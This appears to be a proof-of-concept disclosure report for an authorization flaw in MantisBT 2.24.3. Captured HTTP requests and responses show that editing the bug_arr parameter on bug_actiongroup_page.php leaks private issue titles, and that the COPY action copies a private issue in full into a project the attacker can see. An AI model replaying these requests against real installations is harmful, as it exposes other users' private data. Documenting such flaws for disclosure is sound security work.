### Initialize - As admin create two projects one public and a private project ### Access? What access - Go to manager (in this case he serves as the attacker) - In order to prove that we currently don't have access you can go to [http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2](http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2) - private project [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1) - issue belong to a private project - It should return ``Access Denied.`` ### Initialize scenario - As admin report an issue to your the private project **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------373865978329646363701737804542 Content-Length: 2515 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=2; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3A-2; PHPSESSID=cbhds6ef6rlv01qob6eck59mjk; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=d4bc9ab210dcc813246fd03cd1c352ee0904b8196eafc0fa7a1572d1838dbaa6; MANTIS_BUG_LIST_COOKIE=1 Upgrade-Insecure-Requests: 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="bug_report_token" 20200927nVFRNDA3foc7zbvDhVjrA1a8sWl3Fe_S -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="m_id" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="project_id" 2 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="category_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="reproducibility" 90 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="severity" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="priority" 20 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="platform" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="os_build" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="handler_id" 1 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="summary" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="description" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="steps_to_reproduce" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="additional_info" This is my private issue please dont access me -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_string" -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="tag_select" 0 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------373865978329646363701737804542 Content-Disposition: form-data; name="view_state" 10 -----------------------------373865978329646363701737804542-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:29:50 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:29:50 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:29:50 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10556 Connection: close Content-Type: text/html; charset=UTF-8 MantisBT
``` ### Attacker init > This is just additonal information you can disregard this issue but because of internet connection issues I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id= the project title can be disclose, it returns ``access denied`` but the dropdown for projects render the title of the project - There are two ways to initialize for the attacker, the attacker have old report or the attacker can report a new issue, I will just use the create a new issue **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573 Content-Length: 2423 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="bug_report_token" 20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="m_id" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="project_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="category_id" 1 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="reproducibility" 10 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="severity" 20 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="priority" 30 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="platform" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="os_build" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="handler_id" 2 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="summary" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="description" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="steps_to_reproduce" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="additional_info" Hello I am the attacker -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_string" -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="tag_select" 0 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="max_file_size" 5000000 -----------------------------427049419225960153701985913573 Content-Disposition: form-data; name="view_state" 10 -----------------------------427049419225960153701985913573-- ``` **Response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:34:54 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:34:54 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 10525 Connection: close Content-Type: text/html; charset=UTF-8 MantisBT
``` ### Launch attack -as manager go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8) - 2 vulnerable function here are ``Move`` and ``Delete``, lets start with ``move`` functionality **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE ``` - Just edit the ``bug_arr%5B%5D=`` to ``7`` <- private issue and it will render the summary/title of the issue - ``Delete`` functionality is almost the same **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE ``` - Take note you can't move/delete these issues, it returns ``You did not have appropriate permissions to perform that action.`` however its too late, the summary/title already leaked.. ### Copying issues : For fun fun fun! - In this part the attacker manage to **fully leaked** the issues - As malicious actor go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184) - You can see the ``Viewing issues`` part and the ``select all`` checkbox and a dropdown.. - The problem on this dropdown is the ``Copy`` functionality > Note : I notice that the ``Assigned to Me (Unresolved)`` have different number of parameters,the ``bug_arr_all=all`` is required, go select the ``Assigned to Me (Unresolved)`` compare to ``unassigned`` which doesn't have ``bug_arr_all=all`` **Normal request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=8&bug_arr_all=all&action=COPY ``` **Normal response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:50:18 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:50:18 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 11551 Connection: close Content-Type: text/html; charset=UTF-8 MantisBT

Copy issues to

Copy issues to
Selected Issues
0000008 Hello I am the attacker
``` - Change the value of ``bug_arr%5B%5D=`` to ``7`` **Exploit request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=7&bug_arr_all=all&action=COPY ``` **Exploit response** ``` HTTP/1.1 200 OK Date: Sat, 26 Sep 2020 23:51:40 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:51:40 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:51:40 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Vary: Accept-Encoding Content-Length: 11070 Connection: close Content-Type: text/html; charset=UTF-8 MantisBT

Copy issues to

Copy issues to
Selected Issues
0000007 This is my private issue please dont access me
``` - It will redirect to ``bug_actiongroup_page.php`` - Click the ``Copy issues`` **Request** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2 Upgrade-Insecure-Requests: 1 bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1 ``` **Response** ``` HTTP/1.1 302 Found Date: Sat, 26 Sep 2020 23:56:39 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 X-Powered-By: PHP/7.1.33 Cache-Control: no-store, no-cache, must-revalidate Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ X-Content-Type-Options: nosniff Expires: Sat, 26 Sep 2020 23:56:39 GMT X-Frame-Options: DENY Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data: Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 ``` - we finally leaked the full information of a private issue ! ### It's too late The following function allows me to disclose the title this stuffs can be found on ``bug_actiongroup_page.php`` **This is the overall request they are just different action value** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION ``` The title for this section is too late because they don't allow the certain functionality but they already leaked the summary - move issues returns ``You did not have appropriate permissions to perform that action.`` - assign issues returns ``You did not have appropriate permissions to perform that action.`` - close issue returns ``You did not have appropriate permissions to perform that action.`` - delete issue returns ``You did not have appropriate permissions to perform that action.`` - resolve issues returns ``You did not have appropriate permissions to perform that action.`` - set sticky return ``You did not have appropriate permissions to perform that action.`` - update priority returns ``You did not have appropriate permissions to perform that action.`` - update severity returns ``Access Denied.`` - update status returns ``You did not have appropriate permissions to perform that action.`` - update view returns ``You did not have appropriate permissions to perform that action.`` - add note returns ``Access Denied.`` - attach tags returns ``Attach permission denied.``